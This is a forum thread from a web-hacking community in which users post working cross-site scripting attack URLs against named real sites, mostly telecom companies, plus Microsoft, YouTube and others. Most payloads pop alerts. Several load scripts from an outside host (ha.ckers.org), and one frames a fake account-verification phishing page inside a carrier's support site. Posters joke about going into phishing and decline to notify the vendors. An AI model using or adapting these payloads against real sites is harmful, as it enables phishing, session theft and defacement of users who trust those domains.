http://www.comcast.net/signin.jsp?redirectUrl=%22><script>alert(%22XSS%22)</script><b%20

as you can tell from the url.. i was actually looking for redirects, but xss is always a bonus ^^

-maluc

https://www.em.avnet.com/sts/home/0%2C11497%2CRID%3D0&CID%3D32209&CCD%3DUSA&SID%3D0&DID%3DDF2&LID%3D0&BID%3DDF2&CTP%3DSTS%2C00.html?ACD=1&UID='%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

This is a pretty good example of jumping out of encapsulation while in a JavaScript function: http://www.microsoft.com/mac/resources/templates.aspx?pid=templates&browser=1&app=&group=&category=&template=%22;alert(%22XSS%22);//

- RSnake
Gotta love it. http://ha.ckers.org

Is it goon-line or go-online? The world may never know: http://goonline.seeq.com/seeq/int_results.jsp?portal_id=1&domain=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&tag=fdsa&keyword=blah

- RSnake
Gotta love it. http://ha.ckers.org

heh, a very phishable find..
and coincidentally, the last javascript string escaping i posted was from their partners in ineptitude http://sla.ckers.org/forum/read.php?3,44,727#msg-727

-maluc

This is very similar to the Microsoft one: http://www.vh1.com/search/search.jhtml?searchterm=%22;alert(%22XSS%22);//&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Same vein... I'm on a roll tonight... so I guess this proves that removing < and > isn't the be all end all: http://www.mtv.com/search/index.jhtml?searchterm=%22);alert(%22XSS%22);//&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

http://www.ask.com/webprefs?o=0&l=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

http://search.about.com/fullsearch.htm?terms=%22%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E

- RSnake
Gotta love it. http://ha.ckers.org

Hmm... actually looks like all their cnames are vulnerable too... You know this is the exact reason I loathe about.com... it tries to be everything to everyone and therefore spam all the search engines. Now everything is vulnerable: http://math.about.com/od/mathjokes/index.htm?terms=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/SCRIPT%3E

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 09/24/2006 12:17AM by rsnake.

lol.. you're certainly on a roll .. and yes, about.com seems to try and have half an answer to everything you need =.=''

http://search.comcast.net/?q=%3Cscript+src%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2Fscript%3E&cat=Images&con=net&x=0&y=0

-maluc

http://www22.verizon.com/Search/Results/?SearchText=%27+style%3D-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29+onmouseover%3D%27alert%28%22XSS%22%29%27+b&x=14&y=10&box=1&QueryText=%27+style%3D-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29+onmouseover%3D%27alert%28%22XSS%22%29%27+b&Coll1=1&Coll=Enterprise%2C+Federal%2C+Wholesale%2C+Corporate+Information%2C+LearningCorner&Coll2=home_products%2C+home_support%2C+business_products%2C+business_support&site=&ps=1&om=1&cs=1&checkall=&resultspage=firstpage&ResultStart=1&ResultCount=3&statechoice=ALL&cmd=new&kb=&from=1

onmouseover the 'Search for' box.. unless you use firefox

-maluc

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://business.verizonwireless.com/b2b/jsp/popups/optin.jsp&email=xss'><script>alert('XSS')</script><b%20 business.verizonwireless.com

-maluc

http://search.t-mobile.com/inquiraapp/ui.jsp?ui_mode=question&question_box=Is%20This%20Vulnerable?%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

maybe i should get into the phishing business.. it just seems too easy _-_

-maluc

http://supportcingular.atgnow.com/cng/resultDisplay.do?page=http%3A%2F%2Fha.ckers.org/images/stallowned.jpg&result=9&responseid=bfd397882facb4d9%3A35998f%3A10dde0404b3%3A3c92&groupid=1&contextid=10261%3A849.980&clusterName=CingularCluster&doctype=1000&excerpt=Download+the+fix+from%3A+http%3A%2F%2Fwww.google.com%2Fdownloads%2Fdetails.aspx%3FFamilyID%3D17d997d2-5034-4bbb-b74d-ad8430a1f7c8%26DisplayLang%3Den#Goto849

so this is not really XSS.. but it's amusing. auto-defacer

Edit: it seems you need a sessionid first.. so click twice

-maluc



Edited 1 time(s). Last edit at 09/24/2006 05:56AM by maluc.

http://www.cingular.com/sbc/other_databases/locator/storeLocator?link=cingnew_map&var20=http%3A%2F%2Fwww.cingular.com&var21=&sqlcol1=INTERNET_FLAG&sqlcnd1=%3D&sqlval1=%27Y%27&streetaddress=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cb+&city=maluc&state=NY&zip=10308&queryRadius=5&submit.x=19&submit.y=2

cingular took longer than the others.. so good job to them

-maluc

again because i was bored.. http://onlinecare.cingular.com/support/knowledgeBase.do?content=%68tt%70%3a%2f/cingular%2ego%2edyndns%2e%6frg/accountverify.html
feel free to login..

This isn't arbitrary XSS, only iframe injection solely from the link: content=http://evil.com .. but it is a good example to show that an injection under /support/ can be quite damaging from phishing - even when just an iframe.

This one is particularly well suited for phishing, since the domain still stays as onlinecare.cingular.com (not so with redirects) .. and the URL is short (long hex encoded strings look suspicious) and the rest of the site is functional and convincing

hopefully, for their sake, they fix it soon - although i'm too lazy to notify them.

-maluc

http://www1.sprintpcs.com/learn/form_public_question.jsp?bmForm=sendEmail&bmFormID=1159089875101&bmUID=1159089875101&bmIsForm=true&bmPrevTemplate=learn%2Fform_public_question.jsp&bmText=EMAIL_QUESTION%3C%3EfName&bmRequired=EMAIL_QUESTION%3C%3EfName&EMAIL_QUESTION%3C%3EfName=&bmText=EMAIL_QUESTION%3C%3ElName&bmRequired=EMAIL_QUESTION%3C%3ElName&EMAIL_QUESTION%3C%3ElName=&bmText=EMAIL_QUESTION%3C%3EcontactNo&bmRequired=EMAIL_QUESTION%3C%3EcontactNo&EMAIL_QUESTION%3C%3EcontactNo=&bmText=EMAIL_QUESTION%3C%3EemailUs&bmRequired=EMAIL_QUESTION%3C%3EemailUs&EMAIL_QUESTION%3C%3EemailUs=&bmSingle=EMAIL_QUESTION%3C%3Etopic&EMAIL_QUESTION%3C%3Etopic=&bmText=EMAIL_QUESTION%3C%3Etext_area&EMAIL_QUESTION%3C%3Etext_area=XSS+Goes+Here%3C%2Ftextarea%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&bmText=charCountMeter&charCountMeter=1147&bmImage=submit.x&bmImage=submit.y&submit.x=33&submit.y=12&bmFields=bmForm%2CbmFormID%2CbmUID%2CbmIsForm%2CbmPrevTemplate%2CbmText%2CbmRequired%2CbmSingle%2CbmImage&bmHash=bfdeb512638bba6615437a7e4aacdbd04e5ae756

no wonder HP can get phone records so easily _-_

Edit: Again, needs token first .. might be a way to use session fixation on some of them.. i'll check on it later

-maluc



Edited 1 time(s). Last edit at 09/24/2006 05:59AM by maluc.

here's another good example for injecting inside script tags.. http://www.vodafone.com/site_search_results/0,3062,CATEGORY_ID%253D200%2526LANGUAGE_ID%253D0%2526CONTENT_ID%253D0,00.html?section=all&company=all&KWD=%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E%3Cb+&submitButton=%C2%BB

the filter correctly encodes special characters to unuseable but displayable forms.. but inside javascript, it escapes double quotations to \" .. which does nothing to prevent you from prematurely ending a string.

However, it also translates } into | .. just to be a pain. and prevents anyone from ending the if(null=null) { blah; | statement. Thus the need for a new set of script tags

\";</script><script>alert('XSS');</script><b

-maluc

http://www.chinaunicom.com/search/search.jsp?s_con=I%20Have%3Cscript%3Ealert('XSS')%3C/script%3E%20no%20idea%20how%20to%20read%20mandarin no filters

-maluc

http://buscador.telefonica.es/jsp/index.jsp?QUERYSTRING=&NOMLIB=telefonica%7Ctelefonicacom%7Cgrupo_telefonicaonline%7Cgrupo_Telefonicamoviles%7Cgrupo_telefonicadata%7Cgrupo_telefonicamedia%7Cgrupo_cabitel%7Cgrupo_fundaciontelefonica%7Cgrupo_telefonicaid%7Cgrupo_telefonicacable%7Cgrupo_terra%7C&QUERYTYPE=1&QUERYLEVEL=2&DOFRAME=YES&NRESULT=10&PAG=DORESULT&PAGINA=0&FILEINI=&SALADEPRENSA=&IDIOM=&QUERYTXT=a'><script>alert('XSS');</script><b no filters

-maluc

http://www.orange.com/francais/search/default.asp?qt=maluc%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&ref=form&nh=100&postback=true&col=frhtml no filters .. big french cell phone company, if you're american and don't know them

-maluc

http://www.telecomitalia.com/cgi-bin/tiportale/TIPortale/ep/programView.do?string=a%22></iframe><script>alert(%22XSS%22)</script><b&Submit=&saveResults=true&saveResults=true&logDebug=true&indexName=TELECOM&lang=ENGLISH&encoding=UTF-8&abstractLength=300&hitsPerSet=10&startSet=1&LANG=EN&tabId=0&pageTypeId=9535&channelId=-8661&programId=27833&programPage=%252Fep%252Fcommon%252FsearchResult.jsp&BV_UseBVCookie=Yes it looks like you first need a session id before this'll work .. (i.e. click the link twice)

no filters.. breaking out of iframe

and i'm exhausted now.. so i'll finish the rest of the top 15 phone companys tomorrow ... http://en.wikipedia.org/wiki/List_of_mobile_network_operators

-maluc


btw RSnake: the link compactor is quite sensitive about unencoded quotations like in: http://www.telecomitalia.com/cgi-bin/tiportale/TIPortale/ep/programView.do?string=a"></iframe><script>alert("XSS")</script><b&Submit=&saveResults=true&saveResults=true&logDebug=true&indexName=TELECOM&lang=ENGLISH&encoding=UTF-8&abstractLength=300&hitsPerSet=10&startSet=1&LANG=EN&tabId=0&pageTypeId=9535&channelId=-8661&programId=27833&programPage=%252Fep%252Fcommon%252FsearchResult.jsp&BV_UseBVCookie=Yes

damn guys, it's getting to be quite a xss competion here.

http://www.mapquest.com/maps/map.adp?cat=%22%2F%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fweird%2Fstallowned.js%3E%3C%2Fscript

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.travelodge.com/Travelodge/control/Booking/search_results&destination=%22%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E%3C/script%3E&Submit=Submit << http://www.travelodge.com

http://www.reference.com/search?q=';%3E%3C/script%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E%3C/script%3E

http://www.information.com/search/index.html?cat=1&keyword=%22%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E%3C/script%3E

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 3 time(s). Last edit at 09/24/2006 08:27AM by digi7al64.

http://www.youtube.com/results?&search_query=&search_sort='%3E%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

XSS at many popular web sites :)
http://www.securitylab.ru/blog/tecklord/?category=19

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.telenor.com.pk/careers/Jobs.php?&CV_ID=XSS%27%3C&password=a<script>alert(String.fromCharCode(88,83,83))</script>&Submit2=++Sign+In++ telenor.com.pk .. a large norwegian mobile service provider, that i've never heard of .com.pk is their pakistan domain though

They filter most of their site.. but let their SQL errors spit back unfiltered input
There may me an sql injection in a couple places of their site too.. but i fail at sql stuff :/

-maluc

rsnake, could you copy the stallowned.js to ckers.org?
And possible rename it to 1.js or something similar?

Better for obfuscation as well as my poor memory. :P

- Kyran

http://www.teliadk.idlesurf.net/cgi-bin/search.pl?lang_intrf=da&query=asdf%27%3Balert%28%27XSS%27%29%3Bt+%3D%27&x=0&y=0&qtype=and

another cell phone service provider .. .dk = their denmark version

http://se.ext.telia.newjobs.com/login.asp?redirect=h%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cb%20 their job search site.. i dont speak swedish, so not sure if this is a general job site or telia only _-_

http://192.89.232.139/jobs/frmAdSearch.asp?JOBCITY=&JOBUNIT=&JOBTYPE=&JOBFUN=&JOBFUN_SUB=&JOBFUNCTION=&FREE_TEXT=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cb+&JOBSORT=AD_EXT_CDATE&TOP_10=0&L=1 their finnish site, i'm not sure why they don't use a domain name..

http://webbguide.telia.se/redirect.jsp?rid=-1&type=FRONTWEB_INFO_FTG&url=http://nabegr32b.cocolog-nifty.com/wonderfulgr32/images/caterham_seven_csr260.jpg yes i know this is a redirect.. but they were related so i included it here..

-maluc



Edited 3 time(s). Last edit at 09/24/2006 05:54PM by maluc.

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://home.singtel.com/customer_service/cust_serv_emailus.asp&salutation_=&name_=XSS1%22%3E%3Cscript%3Ealert(%22XSS1%22)%3C/script%3E%3Cb%20&nature_of_feedback_=&contact_number_=XSS2%22%3E%3Cscript%3Ealert(%22XSS2%22)%3C/script%3E%3Cb%20&email_=XSS3%22%3E%3Cscript%3Ealert(%22XSS3%22)%3C/script%3E%3Cb%20&commenting_on_=&your_comments_=XSS4</textarea><script>alert(%22XSS4%22)</script> home.singtel.com

singapore cell phone service company .. no filtering - 3 input tags breakout, and 1 textarea breakout

Well my unscientific, and unexhaustive survey found that atleast 12 of the biggest 17 (70%) cell phone service companys have XSS holes ripe for phishing.. sad indeed :T

-maluc



Edited 1 time(s). Last edit at 09/24/2006 06:53PM by maluc.